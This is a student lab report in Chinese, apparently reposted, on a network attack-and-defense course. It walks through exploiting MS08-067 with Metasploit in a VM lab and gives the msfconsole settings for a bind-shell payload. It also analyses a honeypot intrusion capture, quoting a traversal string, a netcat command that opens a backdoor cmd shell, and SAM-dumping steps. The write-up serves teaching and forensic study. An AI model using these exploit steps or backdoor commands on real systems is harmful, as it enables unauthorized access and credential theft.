这篇文章介绍了20253904 2025-2026-2 《网络攻防实践》第六周作业，分享给大家做个参考，收藏极客资料网收获更多编程知识

20253904 2025-2026-2 《网络攻防实践》第六周作业

Part 1 TCP/IP协议栈重点协议攻击实验

1. 实验环境

实验目的：

1. 动手实践Metasploit windows attacker
使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

2. 取证分析实践：解码一次成功的NT系统破解攻击。

• 来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
• 攻击者使用了什么破解工具进行攻击
• 攻击者如何使用这个破解工具进入并控制了系统
• 攻击者获得系统访问权限后做了什么
• 我们如何防止这样的攻击
• 你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么

3. 团队对抗实践：windows系统远程渗透攻击和分析。

• 攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）
• 防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

实验环境：

• 硬件环境：
  • GPU：NVIDIA GeForce RTX 5070 Ti Laptop
  • CPU：AMD Ryzen 9 9955HX（16核）
• 软件环境：
  • 操作系统：Windows 11 家庭中文版
  • 虚拟化平台：VMware Workstation 16.2.4
  • 虚拟机镜像：Kali Linux 2025.4、windows Metasploitable

---

2. 实验内容

2.1 对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击

这个实验需要用到kali和windows Metasploitable，之前这两台虚拟机分别设置在了不同的网段，会导致端口直接联不通，先把靶机的连接方式改成和攻击机一样的：

之前靶机是静态ip地址，得去改成自动分配，然后看一下新的ip地址ipconfig，可以看到是192.168.200.10.

打开kali，开始进行攻击，输入msfconsole进入msf面板。

输入search ms08_067可以查看已有的ms08_67漏洞，都存在exploit/windows/smb/ms08_067_netapi里。

使用use /windows/smb/ms08_067_netapi来选定攻击方式。

可以通过show payloads查看一下payload参数。这里选择shell_bind_tcp，不然会报错。

接下来由于windows2000版本比较老，在攻击前要进行一系列设置调整，输入下面这些指令：

# 将目标强行设置为windows2000
set target 1
# 关闭 SMB 强制加密
set SMB::AlwaysEncrypyt false
# 关闭 SMB 签名验证
set SMB::VerifySignature false
# 设置payload
set PAYLOAD windows/shell_bind_tcp
# 靶机IP
set RHOST 192.168.200.10
# 攻击机IP
set LHOST 192.168.200.6

图里靶机IP写错了，改成正确的IP后输入exploit进行攻击，可以看到获得了靶机的控制权，可以进行一些常见操作。

2.2 解码NT系统破解攻击

先把学习通里的文件下载下来，后缀从.log改成.pcap，共享到虚拟机，通过wireshark进行分析。首先在117号报文这里发现了%C0%AF../boot.ini，说明攻击者开始使用目录遍历攻击。

接着可以通过查看TCP流的方式来解码攻击，在TCP流11中可以看到sql注入攻击。

在流27中攻击者尝试登陆用户，并下载相关工具，但都因为权限不足失败了。

攻击者在流30中再次使用sql注入攻击。

然后在流106的时候攻击者换了个密码再次进行登录，可以看到这次成功登入了用户，并且下载了相关工具。

在流109里，可以看到GET /msadc/.../cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1, 攻击者利用漏洞开启了一个后门端口6969，并绑定了cmd shell，成功夺取了靶机的控制权。

在流111中，攻击方开始进行一系列操作，可以把这个流输出成pdf，以便于分析。

攻击者进行了一系列操作，比如查看文件夹和删除之前上传的FTP脚本，清楚自己登录的痕迹。

浏览系统中已有的文件目录。

使用net session查看所有的链接，因为没有权限被拒绝了。然后使用net users查看所有的用户。

尝试使用net添加一个新用户，返回提示system error 1312，这一般也是由于权限不足导致的。

接下来攻击者尝试通过获取数据备份的方式来获取SAM，执行rdisk -s进行备份，这样系统会生成sam._备份文件，把这个文件打包传回本地，进行分析就可以获取很多重要信息。

接下来攻击者尝试访问sam._，但因为权限不足失败了。

再往后看，可以看到攻击者留下了一句信息，这证明攻击者已经意识到这是一个蜜罐服务器(lab server)，这次攻击仅仅作为一次漏洞测试。

总结一下上述分析过程，可以回答一开始提出的几个问题：

• Q：攻击者使用了什么破解工具进行攻击
• A：
• Q：攻击者如何使用这个破解工具进入并控制了系统
• A：
• Q：攻击者获得系统访问权限后做了什么
• A：
• Q：我们如何防止这样的攻击
• A：
• Q：你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么
• A：

2.3 团队攻击实践

这次团队攻击实践和20253909李佳橦一起完成，李佳橦作为攻击方，我作为防守方。

首先攻击方和防守方都将虚拟机的连接方式改为桥接模式，并勾选“复制物理网络链接状态”。

然后查看一下攻击方和防守方的IP地址，攻击方的IP地址为192.168.43.131，防守方的IP地址为192.168.43.3。

接下来进行连通性测试，双方都可以ping通。

防守方使用kali连入相同网段，使用kali的wireshark进行监听，可以测试一下，在攻击方ping防守方时可以抓到对应流量包。

接下来攻击方进行同2.1相同的攻击方式，利用ms08_067漏洞获取防守方控制权。

接下来攻击方按照下面的指令新建文件夹并写一个文件：

mkdir shuaige
cd shuaige
echo I am lijiatong 20253909 lijiatong>>Test.txt

防守方可以进入对应文件夹查看攻击方新建的文件。

防守方查看一下wireshark抓到的包，查看TCP流，可以看到攻击方输入的一系列指令。

---

Part 2 学习总结

1. 知识点总结

---

2. 学习中遇到的问题与解决

• 问题1：在实验1中攻击机获取靶机控制权时无法连接。
• 问题1解决方案：在解决这一问题时进行了大量测试，由于过程比较混乱，无法确定是哪一步操作解决了问题，只能列举一下进行的所有操作：
  • 将靶机调到和攻击机一样的网段（vmnet8）。
  • 将靶机的ip地址改为自动分配。
  • 修改攻击机攻击时的目标、SMB相关配置和payload。
• 问题2：在实验3中选择桥接模式后kali连不上网络。
• 问题2解决方案：用校园网会导致这个问题，换成流量就能连上了。

---

3. 学习感悟与思考

上次刚说完有分析内容，这次就有了分析完整攻击报告的任务，而且这次有更高的分析要求，需要在大量的分析的数据里找到对应的操作，为此需要充分了解常见的攻击方式、攻击路径以及windows的一部分操作指令。在网上查阅资料、进行分析的过程，大幅丰富了我的网络攻防知识。同时第三个实践任务算是第一次不是在自己的环境中进行的攻击实践，这让我...

---

文章来源:https://www.cnblogs.com/dhpqwq/p/19921744
本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若内容造成侵权/违法违规/事实不符，请联系邮箱：jacktools123@163.com进行投诉反馈，一经查实，立即删除！